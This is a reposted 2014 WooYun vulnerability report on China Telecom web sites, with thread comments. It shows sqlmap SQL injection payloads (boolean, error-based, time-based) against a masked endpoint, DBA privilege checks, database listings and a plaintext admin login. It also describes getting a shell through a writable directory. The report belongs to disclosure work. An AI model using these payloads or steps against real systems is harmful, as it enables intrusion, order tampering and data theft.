中国电信SQL注入等漏洞可进入后台Getshell等威胁(二)

2015年6月17日06:26:56评论396 views字数 237阅读0分47秒阅读模式

摘要

2014-09-17：细节已通知厂商并且等待厂商处理中
2014-09-20：厂商已经确认，细节仅向厂商公开
2014-09-30：细节向核心白帽子及相关领域专家公开
2014-10-10：细节向普通白帽子公开
2014-10-20：细节向实习白帽子公开
2014-10-30：细节向公众公开

漏洞概要关注数(9) 关注此漏洞

缺陷编号： WooYun-2014-76082

漏洞标题：中国电信SQL注入等漏洞可进入后台Getshell等威胁(二)

漏洞作者： kttzd

提交时间： 2014-09-17 14:09

公开时间： 2014-10-30 14:10

漏洞类型：成功的入侵事件

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

买手机是买锤子还是买p6那？

我想多了...

详细说明：

#问题一，上个里面提了一处，但是为什么就修一处。。不把其他地方的也修了那。。

#目标 http://**.**.**.**/SearchList.aspx?sc=3000_5000

加单引号http://**.**.**.**/SearchList.aspx?sc=3000_5000' 爆出语句。

不继续构造了。

#问题二

北京电信翼商城存在注入漏洞，最后getshell

#注入点

http://**.**.**.**/ajax_check_user.php?email=

------------------------------------------------------------------

Place: GET

Parameter: email

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: email=' AND 6307=6307 AND 'Okvb'='Okvb

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: email=' AND (SELECT 2893 FROM(SELECT COUNT(*),CONCAT(0x717a637471,(SELECT (CASE WHEN (2893=2893) THEN 1 ELSE 0 END)),0x71766c7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AmJt'='AmJt

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: email=' AND SLEEP(5) AND 'YLcy'='YLcy

---

[21:26:50] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.2.14

back-end DBMS: MySQL 5.0

----------------------------------------------------------------

#权限

----------------------------------------------------------------

[21:28:25] [INFO] testing if current user is DBA

[21:28:25] [INFO] fetching current user

[21:28:25] [INFO] resumed:

current user is DBA: True

-----------------------------------------------------------------

#数据泄漏

available databases [11]:

[*] dspam

[*] ego10000

[*] ego10000_bak

[*] extmail

[*] hallylure

[*] information_schema

[*] mysql

[*] shopstit

[*] stit_v3

[*] test

[*] ybzdb

可以找到后台账户密码，并且没有md5加密。直接进后台

比如账户wlj 密码 111

后台可以改订单，可以改价格。

---------------------------------------------------------------------

#getshell

通过http://**.**.**.**/includes/footer.php 爆出路径

/var/www/site/**.**.**.**/

一顿试。最后/var/www/site/**.**.**.**/img/big/目录可写

翻到了数据库密码，随便看下出问题的界面

code 区域

include_once dirname(__FILE__).'/include.php';
 include_once WWW_ROOT_PATH.'/cls/reg.class.php';
 postSql();
 $email = trim($_REQUEST['email']);
 $reg =new reg();
 $flag =  ($reg->check_user($email)) ? 1 : 0;
 echo $flag;

其中$email接受 email来的数据之后什么也没过滤检查，就带入check_user。（未检查chcek_user函数）运行个三则运算。

留下尾巴证明来过

http://**.**.**.**/img/big/2.txt

---------------------------------------------------------------

完毕

漏洞证明：

修复方案：

过滤

版权声明：转载请注明来源 kttzd@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2014-09-20 08:56

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-09-15 17:22 | 爱Gail ( 普通白帽子 | Rank:237 漏洞数:38 | 爱漏洞、爱编程、爱旅游、爱Gail)

1

等待揭秘哪个站

1# 回复此人
2014-09-20 22:26 | 丸子响当当 ( 路人 | Rank:8 漏洞数:5 | 学习温习•••••••)

0

电信是不是该换运维了

2# 回复此人
2014-10-30 14:49 | BMa ( 核心白帽子 | Rank:2078 漏洞数:229 )

0

一直没修复

3# 回复此人
2014-10-30 16:41 | nzk1912 ( 实习白帽子 | Rank:41 漏洞数:10 | 软件开发8年了，也来挖挖漏洞，为创建安全...)

0

走的是大厂商吗？

4# 回复此人

漏洞概要 关注数(9) 关注此漏洞

缺陷编号： WooYun-2014-76082

漏洞标题： 中国电信SQL注入等漏洞可进入后台Getshell等威胁(二)

相关厂商： 中国电信

漏洞作者： kttzd

提交时间： 2014-09-17 14:09

公开时间： 2014-10-30 14:10

漏洞类型： 成功的入侵事件

危害等级： 高

自评Rank： 20

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 kttzd@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(9) 关注此漏洞

漏洞标题：中国电信SQL注入等漏洞可进入后台Getshell等威胁(二)

相关厂商：中国电信

漏洞类型：成功的入侵事件

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分